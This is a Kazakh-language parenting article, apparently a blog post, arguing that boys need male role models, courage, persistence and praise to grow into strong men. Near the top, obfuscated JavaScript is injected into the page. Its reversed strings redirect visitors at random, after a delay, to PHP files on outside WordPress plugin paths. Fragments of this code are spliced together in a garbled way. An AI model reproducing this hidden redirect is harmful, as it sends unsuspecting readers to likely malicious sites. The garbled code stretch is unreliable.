Ер азаматтар әлсіз боп барады дейміз…

ssora$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/ssora.jpg» height=»218″ width=»261″ />Кіналаймыз, ғайбаттаймыз… Ол қайдан шықты? Әрине, біздің қоғамнан, біздің ортамыздан. Болары болған соң кінәліні іздеу , жартасқа  барып айқайлаумен бірдей. Ал, себебін іздесек, нәтиже көруіміз әбден мүмкін.
                Себеп…. Қандай да бір жағдай болмасын бәрінің себебі болады. Егер сіздің жаныңызда болашақта шын мәнінде күшті, батыл, епті, азамат атына лайық ер азаматтар жүрсін десеңіз, бүгіннен бастап ұлдарыңыздың өзін солай  ұстауына жағдай жасаңыз! Отбасыңызда өсіп келе жатқан азаматтың тәрбиесі мен дамуына ерекше көңіл бөліңіз, неге үйрету керек, нені білуі керек, мұның бәрін білу МАҢЫЗДЫ!

                Көпшілік жағдайда біз ата-аналар балаға  жалпы «бала» ретінде қараймыз. Ұл қыз деп бөле бермейміз. Отбасында тәрбие дұрыс болу керек. Болды. Ал, қазір көп айтылып жүрген гендерлік саясат, ұл мен қыздың арасындағы психикалық, қылықтық айырмашылықтар есейгенде емес, өте ерте балалық шақтың өзінде басталады.  Шығар қорытынды ұл мен қызға бірдей тәрбие беруге болмайды.
                Ер азаматтар біздің қоғамда басымдыққа ие. Әйелдермен салыстырғанда жұмысты тез табады, жалақысы да жоғары, басшылық орындарға да жиі жоғарылатылады. Отбасында да  бас ие- отағасы, мұнымен бәріміз келісеміз. Солай болу керек. Сөйте тұра  балаға тәрбие берудегі  барлық билік тек ӘЙЕЛДЕРГЕ берлген. (отбасын айтпағанда бала бақша, мектептерді аралап көріңіз) Жөргектегі баладан бастап, аттестат алғанға дейін ұлдарымыз  әйелдер қауымының ортасында жүреді. Анасы, әжесі, тәрбиешісі, ұстазы Жасыратыны жоқ, қазір  анасы мен баласынан тұратын отбасылар аз емес. Отбасы бүтін болғанның өзінде ұлдар әке көңілінен алыстау, себеп біздің әкелеріміз бар күшін ЖҰМЫСҚА береді.
                Өмір бойы осылай десек жаңыламыз. Жиырмасыншы ғасырдың басында біздің аталарымыз  ұл мен қызды тәрбиелеу ұстанымдарының әртүрлі екенін білді. 7-8 жастан кейін ұлдар  ер азаматтардың ортасынан табылды.(Абай жолын еске түсіріп көріңіз) Ұлдар оқу үшін ауыл молдасына (қыз Бен ұл бөлек-бөлек дәріс алады) кәсіп үйрену үшін ұстаханаларға барды. Мал баққанның өзінде ерлер қауымының ортасына түсті. Өз нанын өзі табуға   қазіргі уақытпен салыстырғанда мектеп табалдырығын аттайтын жастан-ақ әрекеттенді. Осыдан небәрі 100 жыл бұрын ұлдар  үйдің еркекке қатысты шаруасын дөңгелетіп әкетпесе де меңгере бастады. Ол кезде қазақ айтатын «13-те отау иесі» деген нақылдың маңызы бар-ды, қазір келемежге ұқсай ма қалай өзі. Бойы өзімізбен бірдей болып , мұрты тебіндеп қалған бозбалалардың өзін «сенің әлің жетпейді ғой»  деп өбектеп бала көреміз, кейбіріміз мектепке жетектеп баруға да дайынбыз. Ал, ол кездің осы жастағы  ұлдары аға буынның, ағаларының, әкелерінің ортасында жүріп, олардан  өмір сүрудің сабақтарын «ер азаматша» меңгере бастады.
 
Ер азамат атқаратын жұмыс емес
                Біз әйелдер тамақ әзірлейміз, үйдің тазалығын қадағалаймыз, кір жуамыз, киім-кешекті бүтіндейміз. Қыздарымыз бізге қарап өседі,  үйренеді, тәжірибе жинақтайды. Бұрыннан солай, қазірде.
                Ал, ер азаматтар атқаратын міндеттер өзгерді. Аң аулау, балық аулау бұрын  күнкөріс қамы болса, бүгінде  хоббиге айналды. Ауылдық жерлерде болмаса ағаш та жармайды, жер де аудармайды. Үйдегі шегені де арнайы шеберлер алдыртып қақтыратын болдық. Ер азаматқа тән мінездер, жылдам шешім қабылдау, батылдық, төзімділік сияқты  қасиеттерді шыңдайтын ауыр жұмысты бүгінде ерлердің белгілі бөлігі ғана атқарады. Ал, ұлдарымызда әкесін жұмыс орнында көретіндей мүмкіндік жоқ. (Бүгінгінің ер азаматтары  төзімділігін, іскерлігін бәрін-бәрін жұмыс орнында көрсетеді.) Өмір солай, амал жоқ отағаларын (әкелерін) ұлдары үйде анасының берген тапсырмасын орындап жүргенде көреді.  Отағасы  үйде теледидар көреді, газет оқиды. Өсіп келе жатқан ұлдың көретіні осы. Мұнан не тәрбие алуға, не үйренуге болады?
Сөйтемізде бүгінгінің азаматы әлсіз дейміз
                Ер балаға қоғамда  өзіне тән ролді ойнау үшін, өзін ерлер қауымының мүшесі ретінде сезінгені маңызды.(өз құндылығы, ережесі, шектеулері мен еркіндігі бар үлкендер одағын айтып отырмыз) Бұл балаға ерлердің мінез-құлығы қандай болу керек, содан хабар береді және еліктейтін адамын табуына көмектеседі.
                Мәселен, мұндай одақтар қатарына кіретін әскери мектептер,  мінезді бапкері бар спорт секцияларына барып жүрген ұлдар ерте есейеді, 12-14 жасында-ақ өздерін үлкендер сияқты сезінеді, өзінше шешім қабылдайды. Ал, егер мұндай орта болмаса, ұлдар оны ойдан шығарып алады. Футбол фанаттары, рокер клубтарының пайда болуы ер азаматтар одағына деген осындай  қажеттіліктен туған. 12-15 жасар жасөспірімдер  үлкендердің әлеміне жетелейтін ағаларының ықпалына оңай түсіп қалады. Сондықтан да олардың  дұрыс жолға жетелейтініне көз жеткізгеніңіз абзал!
Ұлдың аты ұл ғой….
                Қыздан гөрі ұлды өсіру қиынырақ.  Олардың тәрбиесінде  маңызды көрінбейтін бір ерекшелік бар. Ер баладан кішкентай кезінде көргіміз келетін жақсы әдеттерді, үлкейгеннен соң да көргіміз келетіні бар. Бірақ бұл дұрыс емес. Жақсы бала- мейірімді, тілалғыш. Егер қыз бала үлкейгенде де осылай болса керемет, өйткені бұл қасиеттер  әйел үшін аса қажет. Ал   ұл үшін өзгеруге тура келеді.
Табандылық, Еркіндік күші
                Өз дегенінде тұра алмаған бала, үлкен болғанда өз мақсатына жетуде табандылық таныта алмайды. Мұндай мінезді тәрбиелеуге қолайлы сәт 3 жас. Бала бізді осы жасында өзінің қайтпайтындығымен, не ойласа соны істету әрекеттерімен әбден әбіржітеді. Ал біз… Оның солай істегенін көтеруіміз керек. Бұл еркіндік күшін тәрбиелейді. Бала өзіне-өзі сенімді бола бастайды. Сіз нәтижені бірден күтпеңіз, ұлыңыздың бұл қасиеті күрес пен жеңіске жетуде көрініс табады. Бірақ мынаны естен шығармаңыз бұл  баланың айтқанын істеуіне 100 пайыз келісіңіз деген сөз емес, 60 пайыз ғана. Балаға айтқанын істеуге 60 пайыз жағдайда мүмкіндік беріңіз.
                Өзіне  деген сенімділік. Бұл жерде абай болу керек. Баланы бар уақытта мақтау, мақтаншақтыққа әкеледі. Қанағаттанбаушылық, сынмен қарау сияқты аса маңызды қасиеттер жоғалады. Егер «Әрине мұны істеу оңай емес, бірақ сені оны істей аласың, сенің қолыңнан келеді», «Адамның бәрінде келеңсіздіктер кездеседі, соған қарамастан  жетістікке жетуге болады» деген сөздер бала кезінде айтылса, онда ол өмір бойына қалады.
Батылдық. Кішкентай бала төбелесу керек.(Кейбір аналар мен әжелер мұнысы несі деуі мүмкін) Егер оның әрекеті қорғану, өзін қорғау мақсатында болса. Бұл ер бала өмірінің ажырамас бір бөлігі және ол осылай есеяді.
Қамқорлық. Сенімділік. Егер анасы оның баласы  қамқор әке, жолдас болатынына сенсе, ол шын мәнінде солай болады. Ол үшін анасы ерлер қауымы туралы жақсы ойлар ойлауы, жақсы сөздер айтуы керек.(Егер сіздің ызаңыз болса, ұлыңыз үшін оны көрсетпеуге тура келеді) Ер азаматтың  балаңыз үшін өте жағымды бейнесін жасаңыз. Сіздің балаңыз үшін жасаған жақсылығыңыз-  қарапайым ғана әйел бақытына ұмтылысыңыз.
Қайырымдылық пен мәрттік. Ұлдар мәжбүрлегенге көндікпейді. Ұлыңыздан шынайы қайырымдылық көру үшін, ерлерге тән мынадай ерекшелікті кәдеге жаратыңыз. Ер азаматтар  жастарына қарамастан мақтау сүйеді, өздерін мақтағанды тәуір көреді.Мақтау қыздармен салыстырғанда ер бала үшін маңызды.Сондықтанда ұлыңыздың жағымды қылықтары туралы міндетті түрде айтып, қолдауыңыз керек. Бұл үйреткеннен гөрі анағұрлым тиімді.
Ашық-жарқындық. «Ұлдар жыламау керек» деген үйреншікті сөзді мейлінше аз айтыңыз. Ой, сезім дүниелерін талқылауға, ортаға салуға шектеу қоймаңыз. Барлық мәселені ортаға салып шешуге болады.{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика